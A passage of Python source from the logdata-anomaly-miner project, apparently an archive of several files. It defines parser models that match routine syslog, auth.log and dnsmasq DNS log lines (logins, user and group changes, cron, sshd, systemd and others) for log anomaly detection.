to {"), DelimitedDataModelElement("imap_addr", b"}"), FixedDataModelElement("brack_str2", b"}"), ]), SequenceModelElement("status", [ FixedDataModelElement("status_str", b'[status] Could not open mailbox "INBOX".'), ]), SequenceModelElement("sync_token", [ FixedDataModelElement("sync_token_str", b"[getSyncToken] IMAP error reported by server."), ]), SequenceModelElement("auth_failed", [ FixedDataModelElement("bracket", b"["), DelimitedDataModelElement("type", b"]"), FixedDataModelElement("auth_failed_str", b"] Authentication failed."), ]), ]), ]), SequenceModelElement("horde", [ FixedDataModelElement("succ_str", b"[horde] "), FirstMatchModelElement("horde", [ SequenceModelElement("success", [ FixedDataModelElement("success_str", b"Login success for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" to horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("success", [ FixedDataModelElement("success_str", b"User "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" logged out of Horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("login_failed", [ FixedDataModelElement("failed_str", b"FAILED LOGIN for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("to_horde_str", b" to horde ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str", b")"), ]), ]) ]), SequenceModelElement("function", [ FixedWordlistDataModelElement("horde_function", [b"[nag]", b"[turba]", b"[horde]"]), FixedDataModelElement("nag_str", b" PHP ERROR: "), FirstMatchModelElement("php_error", [ SequenceModelElement("declaration", [ FixedDataModelElement("declaration_str", b"Declaration of "), DelimitedDataModelElement("function_name1", b"("), FixedDataModelElement("brack_str1", b"("), OptionalMatchModelElement( "arg1", DelimitedDataModelElement("arg1", b")") ), 
FixedDataModelElement("failed_str", b") should be compatible with "), DelimitedDataModelElement("function_name2", b"("), FixedDataModelElement("brack_str2", b"("), OptionalMatchModelElement( "arg2", DelimitedDataModelElement("arg2", b")") ), FixedDataModelElement("brack_str3", b")"), ]), FixedDataModelElement("file_str", b"finfo_file(): Empty filename or path"), FixedDataModelElement("header_str", b"Cannot modify header information - headers already sent") ]) ]), SequenceModelElement("guest", [ FixedDataModelElement("guest_str", b"Guest user is not authorized for Horde (Host: "), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str", b").") ]), SequenceModelElement("php_error", [ FixedDataModelElement("php_error_str", b"PHP ERROR: "), DelimitedDataModelElement("msg", b" ["), ]), SequenceModelElement("free_msg", [ DelimitedDataModelElement("msg", b" ["), ]) ]), FixedDataModelElement("to_str", b" [pid "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("line_str", b" on line "), DecimalIntegerValueModelElement("line"), FixedDataModelElement("of_str", b' of "'), DelimitedDataModelElement("path", b'"'), FixedDataModelElement("brack_str", b'"]') ]), SequenceModelElement("useradd", [ FixedDataModelElement("useradd_str", b" useradd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("useradd", [ SequenceModelElement("cmd", [ FixedDataModelElement("add_str", b"add '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("cmd_str", b"' to "), OptionalMatchModelElement("shadow", FixedDataModelElement("shadow", b"shadow ")), FixedDataModelElement("group_str", b"group '"), DelimitedDataModelElement("group", b"'"), FixedDataModelElement("quote_str", b"'") ]), SequenceModelElement("new_user", [ FixedDataModelElement("new_user", b"new user: name="), DelimitedDataModelElement("user", b","), FixedDataModelElement("uid_str", b", UID="), DecimalIntegerValueModelElement("uid"), 
FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("home_str", b", home="), DelimitedDataModelElement("home", b","), FixedDataModelElement("shell_str", b", shell="), VariableByteDataModelElement("shell", alphabet) ]), SequenceModelElement("new_group", [ FixedDataModelElement("new_group", b"new group: name="), DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]) ]) ]), SequenceModelElement("groupadd", [ FixedDataModelElement("groupadd_str", b" groupadd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("useradd", [ SequenceModelElement("cmd", [ FixedDataModelElement("add_str", b"group added to "), DelimitedDataModelElement("path", b":"), FixedDataModelElement("cmd_str", b": name="), FirstMatchModelElement("fm", [ SequenceModelElement("gid", [ DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]), AnyByteDataModelElement("group") ]) ]), SequenceModelElement("new_user", [ FixedDataModelElement("new_user", b"new user: name="), DelimitedDataModelElement("user", b","), FixedDataModelElement("uid_str", b", UID="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("home_str", b", home="), DelimitedDataModelElement("home", b","), FixedDataModelElement("shell_str", b", shell="), VariableByteDataModelElement("shell", alphabet) ]), SequenceModelElement("new_group", [ FixedDataModelElement("new_group", b"new group: name="), DelimitedDataModelElement("group", b","), FixedDataModelElement("gid_str", b", GID="), DecimalIntegerValueModelElement("gid") ]) ]) ]), SequenceModelElement("chpasswd", [ FixedDataModelElement("chpasswd_str", b" chpasswd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", 
b"]: "), FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("pw_changed", b"): password changed for "), AnyByteDataModelElement("user") ]), SequenceModelElement("usermod", [ FixedDataModelElement("usermod_str", b" usermod["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_str", b"change user '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("pw_str", b"' password") ]), SequenceModelElement("chage", [ FixedDataModelElement("usermod_str", b" chage["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_str", b"changed password expiry for "), AnyByteDataModelElement("user") ]), SequenceModelElement("cron", [ FixedWordlistDataModelElement("cron_str", [b" CRON[", b" cron["]), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("cron", [ SequenceModelElement("cmd", [ FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("cmd_str", b") CMD "), AnyByteDataModelElement("cmd_msg") ]), SequenceModelElement("session", [ # This only occurs in auth.log DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("pidfile", [ FixedDataModelElement("str", b"(CRON) INFO (pidfile fd = "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("bracket", b")") ]), 
FixedDataModelElement("str", b"(CRON) info (No MTA installed, discarding output)"), FixedDataModelElement("reboot_jobs", b"(CRON) INFO (Running @reboot jobs)") ]) ]), SequenceModelElement("crontab", [ FixedDataModelElement("crontab_str", b" crontab["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("crontab", [ SequenceModelElement("command", [ FixedDataModelElement("bracket", b"("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket", b") "), FixedWordlistDataModelElement("command", [b"REPLACE", b"LIST"]), FixedDataModelElement("bracket", b" ("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket", b")") ]), FixedDataModelElement("str", b"(CRON) info (No MTA installed, discarding output)"), FixedDataModelElement("reboot_jobs", b"(CRON) INFO (Running @reboot jobs)") ]) ]), SequenceModelElement("sudo", [ FixedDataModelElement("cron_str", b" sudo: "), AnyByteDataModelElement("msg") ]), SequenceModelElement("auth", [ # This only occurs in auth.log FixedDataModelElement("auth_str", b" auth: "), DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): authentication failure; logname="), OptionalMatchModelElement( "logname", DelimitedDataModelElement("logname", b" ") ), FixedDataModelElement("uid_str", b" uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("euid_str", b" euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("tty_str", b" tty="), DelimitedDataModelElement("tty", b" "), FixedDataModelElement("ruser_str", b" ruser="), DelimitedDataModelElement("ruser", b" "), FixedDataModelElement("rhost_str", b" rhost="), IpAddressDataModelElement("rhost"), OptionalMatchModelElement( "user", SequenceModelElement("user", [ FixedDataModelElement("user_str", b" user="), VariableByteDataModelElement("user", alphabet) ]) ) ]), 
SequenceModelElement("systemd", [ FixedDataModelElement("systemd_str", b" systemd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("systemd2", [ FixedDataModelElement("systemd_str", b" systemd: "), DelimitedDataModelElement("pam", b"("), FixedDataModelElement("brack_str", b"("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("systemd-modules-load", [ FixedDataModelElement("systemd_str", b" systemd-modules-load["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("inserted", b"Inserted module '"), DelimitedDataModelElement("module", b"'"), FixedDataModelElement("apo", b"'") ]), SequenceModelElement("systemd-networkd-wait-online", [ FixedDataModelElement("systemd_str", b" systemd-networkd-wait-online["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedWordlistDataModelElement("inserted", [b"managing", b"ignoring"]), FixedDataModelElement("sp", b": "), AnyByteDataModelElement("interface") ]), SequenceModelElement("systemd-fsck", [ FixedDataModelElement("systemd_str", b" systemd-fsck["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("systemd-udevd", [ FixedDataModelElement("systemd_str", b" systemd-udevd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("sshd", [ 
FixedDataModelElement("systemd_str", b" sshd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("new", [ FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FirstMatchModelElement("message", [ SequenceModelElement("session", [ FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ) ]), SequenceModelElement("session", [ FixedDataModelElement("changed_pw", b"): password changed for "), AnyByteDataModelElement("group") ]) ]) ]), SequenceModelElement("publickey", [ FixedDataModelElement("publickey_str", b"Accepted publickey for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("rsa", b" ssh2: RSA "), AnyByteDataModelElement("rsa"), ]), SequenceModelElement("ident", [ FixedDataModelElement("ident_str", b"Did not receive identification string from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), SequenceModelElement("listening", [ FixedDataModelElement("listening_str", b"Server listening on "), DelimitedDataModelElement("ip", b" "), FixedDataModelElement("port_str", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("dot", b"."), ]), SequenceModelElement("signal", [ FixedDataModelElement("signal_str", b"Received signal"), AnyByteDataModelElement("remainder"), ]), SequenceModelElement("rec_disconnected", [ 
FixedDataModelElement("rec_disconnected_str", b"Received disconnect from "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), AnyByteDataModelElement("remainder"), ]), SequenceModelElement("disconnected", [ FixedDataModelElement("disconnected_str", b"Disconnected from user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" "), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), SequenceModelElement("disconnected", [ FixedDataModelElement("disconnected_str", b"Disconnected from "), OptionalMatchModelElement("user", SequenceModelElement("user", [ FixedDataModelElement("user_str", b"user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("space", b" "), ])), IpAddressDataModelElement("ip"), FixedDataModelElement("space", b" port "), DecimalIntegerValueModelElement("port"), ]), FixedDataModelElement("timeout", b"Timeout, client not responding.") ]) ]), SequenceModelElement("su", [ FixedDataModelElement("systemd_str", b" su["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ FixedDataModelElement("brack_str", b"pam_unix("), DelimitedDataModelElement("name", b")"), FixedDataModelElement("session_str", b"): session "), FixedWordlistDataModelElement("status", [b"opened", b"closed"]), FixedDataModelElement("user_str", b" for user "), VariableByteDataModelElement("user", alphabet), OptionalMatchModelElement( "uid", SequenceModelElement("uid", [ FixedDataModelElement("uid_str", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("brack_str", b")") ]) ), ]), SequenceModelElement("seq", [ FixedDataModelElement("brack_str", b"Successful su for "), VariableByteDataModelElement("user", alphabet), FixedDataModelElement("by_str", b" by "), VariableByteDataModelElement("su_user", 
alphabet), ]), SequenceModelElement("seq2", [ FixedDataModelElement("plus", b"+"), AnyByteDataModelElement("msg") ]), ]), ]), SequenceModelElement("kernel", [ FixedDataModelElement("kernel_str", b" kernel"), OptionalMatchModelElement( "id", SequenceModelElement("id", [ FixedDataModelElement("brack_str", b"["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str2", b"]") ]) ), FixedDataModelElement("col_str", b": "), AnyByteDataModelElement("kernel_msg") ]), SequenceModelElement("augenrules", [ FixedDataModelElement("augenrules_str", b" augenrules["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("augenrules_msg") ]), SequenceModelElement("auditd", [ FixedDataModelElement("auditd_str", b" auditd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("auditd_msg") ]), SequenceModelElement("auditd2", [ FixedDataModelElement("auditd2_str", b" auditd: "), AnyByteDataModelElement("auditd_msg") ]), SequenceModelElement("audispd", [ FixedDataModelElement("audispd_str", b" audispd: "), AnyByteDataModelElement("audispd_msg") ]), SequenceModelElement("liblogging", [ FixedDataModelElement("liblogging_str", b" liblogging-stdlog: "), AnyByteDataModelElement("liblogging_msg") ]), SequenceModelElement("os_prober", [ FixedDataModelElement("os_prober_str", b" os-prober: "), AnyByteDataModelElement("os_prober_msg") ]), SequenceModelElement("macosx_prober", [ FixedDataModelElement("macosx_prober_str", b" macosx-prober: "), AnyByteDataModelElement("macosx_prober_msg") ]), SequenceModelElement("haiku", [ FixedDataModelElement("haiku_str", b" 83haiku: "), AnyByteDataModelElement("haiku_msg") ]), SequenceModelElement("efi", [ FixedDataModelElement("efi_str", b" 05efi: "), AnyByteDataModelElement("efi_msg") ]), SequenceModelElement("freedos", [ FixedDataModelElement("freedos_str", b" 10freedos: "), AnyByteDataModelElement("freedos_msg") ]), 
SequenceModelElement("qnx", [ FixedDataModelElement("qnx_str", b" 10qnx: "), AnyByteDataModelElement("qnx_msg") ]), SequenceModelElement("microsoft", [ FixedDataModelElement("microsoft_str", b" 20microsoft: "), AnyByteDataModelElement("microsoft_msg") ]), SequenceModelElement("utility", [ FixedDataModelElement("utility_str", b" 30utility: "), AnyByteDataModelElement("utility_msg") ]), SequenceModelElement("mounted_tests", [ FixedDataModelElement("mounted_tests_str", b" 50mounted-tests: "), AnyByteDataModelElement("mounted_tests_msg") ]), SequenceModelElement("rsyslogd", [ FixedDataModelElement("rsyslogd_str", b" rsyslogd: "), AnyByteDataModelElement("rsyslogd_msg") ]), SequenceModelElement("timesyncd", [ FixedDataModelElement("timesyncd_str", b" systemd-timesyncd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("timesyncd_msg") ]), SequenceModelElement("logind", [ FixedDataModelElement("logind_str", b" systemd-logind["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("new", [ FixedDataModelElement("new_str", b"New session "), DelimitedDataModelElement("session", b" "), FixedDataModelElement("str", b" of user"), AnyByteDataModelElement("user"), ]), SequenceModelElement("removed", [ FixedDataModelElement("removed_str", b"Removed session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("dot", b"."), ]), SequenceModelElement("system_buttons", [ FixedDataModelElement("watching", b"Watching system buttons on /dev/input/event"), AnyByteDataModelElement("event_type") ]), FixedDataModelElement("new_seat", b"New seat seat0.") ])]), SequenceModelElement("grub", [ FixedDataModelElement("grub_str", b" grub-common["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("grub_msg") ]), SequenceModelElement("polkitd", [ FixedDataModelElement("polkitd_str", 
b" polkitd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("polkitd_msg") ]), SequenceModelElement("dbus", [ FixedDataModelElement("dbus_str", b" dbus-daemon["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("dbus_msg") ]), SequenceModelElement("hostnamed", [ FixedDataModelElement("hostnamed_str", b" systemd-hostnamed["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("hostnamed_msg") ]), SequenceModelElement("apport", [ FixedDataModelElement("apport_str", b" apport["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]:"), AnyByteDataModelElement("apport_msg") ]), SequenceModelElement("resolved", [ FixedDataModelElement("resolved_str", b" systemd-resolved["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("resolved_msg") ]), SequenceModelElement("networkd", [ FixedDataModelElement("networkd_str", b" systemd-networkd["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("networkd_msg") ]), SequenceModelElement("networkd-dispatcher", [ FixedDataModelElement("networkd_str", b" networkd-dispatcher["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("no_valid_path", b"No valid path found for "), AnyByteDataModelElement("interface") ]), SequenceModelElement("motd", [ FixedDataModelElement("motd_str", b" 50-motd-news["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("motd_msg") ]), SequenceModelElement("freshclam", [ FixedDataModelElement("freshclam_str", b" freshclam["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("freshclam_msg") ]), 
SequenceModelElement("dhclient", [ FixedDataModelElement("dhclient_str", b" dhclient["), DecimalIntegerValueModelElement("id"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", FirstMatchModelElement("dhclient", [ SequenceModelElement("dhcprequest", [ FixedDataModelElement("dhcprequest_str", b"DHCPREQUEST of "), IpAddressDataModelElement("src_ip"), FixedDataModelElement("on_str", b" on "), DelimitedDataModelElement("network_interface", b" "), FixedDataModelElement("to_str", b" to "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("port_str", b" port "), DecimalIntegerValueModelElement("port"), OptionalMatchModelElement("xid", SequenceModelElement("xid", [ FixedDataModelElement("xid", b" (xid=0x"), HexStringModelElement("hex"), FixedDataModelElement("bracket", b")") ])) ]), SequenceModelElement("dhcpack", [ FixedDataModelElement("dhcpack_str", b"DHCPACK of "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("on_str", b" from "), IpAddressDataModelElement("src_ip") ]), SequenceModelElement("bound", [ FixedDataModelElement("bound_str", b"bound to "), IpAddressDataModelElement("ip"), FixedDataModelElement("renewal_str", b" -- renewal in "), DecimalIntegerValueModelElement("seconds"), FixedDataModelElement("seconds_str", b" seconds.") ]), AnyByteDataModelElement("skipped_msg") ])), ]), SequenceModelElement("apparmor", [ FixedDataModelElement("apparmor_str", b" apparmor["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("snapd-apparmor", [ FixedDataModelElement("snapd-apparmor_str", b" snapd-apparmor["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("snapd", [ FixedDataModelElement("snapd_str", b" snapd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), 
SequenceModelElement("cloud-init", [ FixedDataModelElement("cloud-init_str", b" cloud-init"), OptionalMatchModelElement("pid", SequenceModelElement("pid", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("close_bracket", b"]"), ])), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("irqbalance", [ FixedDataModelElement("irqbalance_str", b" /usr/sbin/irqbalance"), AnyByteDataModelElement("msg")]), SequenceModelElement("pollinate", [ FixedDataModelElement("pollinate_str", b" pollinate["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("lxcfs", [ FixedDataModelElement("lxcfs_str", b" lxcfs["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("accounts-daemon", [ FixedDataModelElement("accounts-daemon_str", b" accounts-daemon["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ec2", [ FixedDataModelElement("ec2_str", b" ec2: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("dnsmasq", [ FixedDataModelElement("dnsmasq_str", b" dnsmasq["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("etc_maradns_mararc", [ FixedDataModelElement("etc_maradns_mararc_str", b" etc_maradns_mararc["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("etc_maradns_mararc-zs", [ FixedDataModelElement("etc_maradns_mararc-zs_str", b" etc_maradns_mararc-zs["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), 
OptionalMatchModelElement("opt", AnyByteDataModelElement("msg"))]), SequenceModelElement("ifup", [ FixedDataModelElement("ifup_str", b" ifup["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("root", [ FixedDataModelElement("root_str", b" root: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ntpd", [ FixedDataModelElement("ntpd_str", b" ntpd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ntp", [ FixedDataModelElement("ntp_str", b" ntp["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("exim4", [ FixedDataModelElement("exim4_str", b" exim4"), OptionalMatchModelElement("opt", SequenceModelElement("pid", [ FixedDataModelElement("open_bracket", b"["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("close_bracket", b"]"), ])), FixedDataModelElement("colon_str1", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("mysqld_safe", [ FixedDataModelElement("mysqld_safe_str", b" mysqld_safe["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("mysqld", [ FixedDataModelElement("mysqld_str", b" mysqld["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("php7.0", [ FixedDataModelElement("php7.0_str", b" php7.0-"), DelimitedDataModelElement("service", b":"), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("libapache2-mod-php7.0", [ FixedDataModelElement("libapache2-mod-php7.0_str", b" libapache2-mod-php7.0: "), AnyByteDataModelElement("msg")]), SequenceModelElement("php", [ FixedDataModelElement("php_str", b" php-"), 
DelimitedDataModelElement("service", b":"), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("apache2_postinst", [ FixedDataModelElement("apache2_postinst_str", b" apache2.postinst: "), AnyByteDataModelElement("msg")]), SequenceModelElement("smbd", [ FixedDataModelElement("smbd_str", b" smbd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ut", [ FixedDataModelElement("ut_str", b" ut["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("apachectl", [ FixedDataModelElement("apachectl_str", b" apachectl["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("ah00548", [ FixedDataModelElement("ah00548", b"AH00548: NameVirtualHost has no effect and will be removed in the next release "), AnyByteDataModelElement("cfg_path") ]) ]) ]) ]) ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds2/000077500000000000000000000000001437606560100265045ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds2/DnsParsingModel.py000066400000000000000000000112521437606560100321100ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from 
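aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement
from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement
from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement
from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement


def get_model():
    """Return a model to parse dnsmasq DNS logs from the AIT-LDS2.

    Every line is expected to start with a "%b %d %H:%M:%S " timestamp, the service
    name, a bracketed PID and "]: ", followed by exactly one of the dnsmasq message
    types listed under the "type" branch. The "domain", "record" and "ip" fields
    parsed here are the values a downstream detector would typically monitor, e.g.
    for unusual record types or unexpected upstream resolvers.

    Returns:
        SequenceModelElement: root element of the parser model.
    """
    # Printable-ASCII alphabet (without space) used where an answer is not
    # necessarily a literal IP address.
    alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]"

    message_types = FirstMatchModelElement("type", [
        SequenceModelElement("query", [
            FixedDataModelElement("query", b"query["),
            # NOTE(review): only the record-type letters seen in the dataset are accepted
            # (A, AAAA, TXT, PTR, MX, SRV, ...). Types containing other letters, e.g. NS
            # or SOA, are not parsed by this branch and end up unparsed.
            VariableByteDataModelElement("record", b"ATXPRMSV"),
            FixedDataModelElement("br_close", b"] "),
            DelimitedDataModelElement("domain", b" "),
            FixedDataModelElement("from", b" from "),
            IpAddressDataModelElement("ip")
        ]),
        SequenceModelElement("reply", [
            FixedDataModelElement("reply", b"reply "),
            DelimitedDataModelElement("domain", b" "),
            FixedDataModelElement("is", b" is "),
            # The answer is taken with the broad alphabet rather than IpAddressDataModelElement;
            # presumably because dnsmasq also logs non-address answers here (names, NXDOMAIN, ...).
            VariableByteDataModelElement("ip", alphabet)
        ]),
        SequenceModelElement("forwarded", [
            FixedDataModelElement("reply", b"forwarded "),
            DelimitedDataModelElement("domain", b" "),
            FixedDataModelElement("to", b" to "),
            IpAddressDataModelElement("ip")
        ]),
        # NOTE(review): the next two branches share the element id "nameserver", so their
        # match paths coincide. Kept as-is because renaming would change paths that detector
        # configurations may already reference.
        SequenceModelElement("nameserver", [
            FixedDataModelElement("nameserver", b"nameserver "),
            IpAddressDataModelElement("ip"),
            FixedDataModelElement("refused", b" refused to do a recursive query"),
        ]),
        SequenceModelElement("nameserver", [
            FixedDataModelElement("nameserver", b"using nameserver "),
            IpAddressDataModelElement("ip"),
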